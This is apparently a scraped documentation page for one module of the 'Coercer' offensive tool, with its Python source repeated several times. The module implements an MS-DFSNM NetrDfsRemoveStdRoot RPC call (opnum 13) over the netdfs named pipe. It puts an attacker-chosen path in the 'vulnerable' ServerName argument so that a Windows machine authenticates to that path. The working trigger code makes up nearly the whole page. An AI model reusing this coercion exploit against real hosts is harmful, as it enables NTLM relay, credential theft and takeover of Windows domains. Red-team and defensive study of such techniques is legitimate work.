coercer.methods.MS_DFSNM.NetrDfsRemoveStdRoot
1#!/usr/bin/env python3 2# -*- coding: utf-8 -*- 3# File name : NetrDfsRemoveStdRootResponse.py 4# Author : Podalirius (@podalirius_) 5# Date created : 14 Sep 2022 6 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL 8from coercer.network.DCERPCSessionError import DCERPCSessionError 9from coercer.core.utils import gen_random_name 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID 12 13 14class _NetrDfsRemoveStdRoot(NDRCALL): 15 """ 16 Structure to make the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol 17 """ 18 opnum = 13 19 structure = ( 20 ('ServerName', WSTR), # Type: WCHAR * 21 ('RootShare', WSTR), # Type: WCHAR * 22 ('ApiFlags', DWORD) # Type: DWORD 23 ) 24 25 26class _NetrDfsRemoveStdRootResponse(NDRCALL): 27 """ 28 Structure to parse the response of the RPC call to NetrDfsRemoveStdRoot() in MS-DFSNM Protocol 29 """ 30 structure = () 31 32 33class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL): 34 """ 35 Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979) 36 37 Method found by: 38 - [@filip_dragovic](https://twitter.com/filip_dragovic) 39 """ 40 41 access = { 42 "ncan_np": [ 43 { 44 "namedpipe": r"\PIPE\netdfs", 45 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 46 "version": "3.0" 47 } 48 ] 49 } 50 51 protocol = { 52 "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol", 53 "shortname": "MS-DFSNM" 54 } 55 56 function = { 57 "name": "NetrDfsRemoveStdRoot", 58 "opnum": 13, 59 "vulnerable_arguments": ["ServerName"] 60 } 61 62 def trigger(self, dcerpc_session): 63 if dcerpc_session is not None: 64 try: 65 request = _NetrDfsRemoveStdRoot() 66 request['ServerName'] = self.path 67 request['RootShare'] = gen_random_name() + '\x00' 68 request['ApiFlags'] = 0 69 resp = dcerpc_session.request(request) 70 return "" 71 except Exception as err: 72 return err 73 else: 74 print("[!] Error: dce is None, you must call connect() first.") 75 return None
34class NetrDfsRemoveStdRoot(MSPROTOCOLRPCCALL): 35 """ 36 Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979) 37 38 Method found by: 39 - [@filip_dragovic](https://twitter.com/filip_dragovic) 40 """ 41 42 access = { 43 "ncan_np": [ 44 { 45 "namedpipe": r"\PIPE\netdfs", 46 "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673", 47 "version": "3.0" 48 } 49 ] 50 } 51 52 protocol = { 53 "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol", 54 "shortname": "MS-DFSNM" 55 } 56 57 function = { 58 "name": "NetrDfsRemoveStdRoot", 59 "opnum": 13, 60 "vulnerable_arguments": ["ServerName"] 61 } 62 63 def trigger(self, dcerpc_session): 64 if dcerpc_session is not None: 65 try: 66 request = _NetrDfsRemoveStdRoot() 67 request['ServerName'] = self.path 68 request['RootShare'] = gen_random_name() + '\x00' 69 request['ApiFlags'] = 0 70 resp = dcerpc_session.request(request) 71 return "" 72 except Exception as err: 73 return err 74 else: 75 print("[!] Error: dce is None, you must call connect() first.") 76 return None
Coercing a machine to authenticate using function NetrDfsRemoveStdRoot (opnum 13) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
Method found by:
def
trigger(self, dcerpc_session):
63 def trigger(self, dcerpc_session): 64 if dcerpc_session is not None: 65 try: 66 request = _NetrDfsRemoveStdRoot() 67 request['ServerName'] = self.path 68 request['RootShare'] = gen_random_name() + '\x00' 69 request['ApiFlags'] = 0 70 resp = dcerpc_session.request(request) 71 return "" 72 except Exception as err: 73 return err 74 else: 75 print("[!] Error: dce is None, you must call connect() first.") 76 return None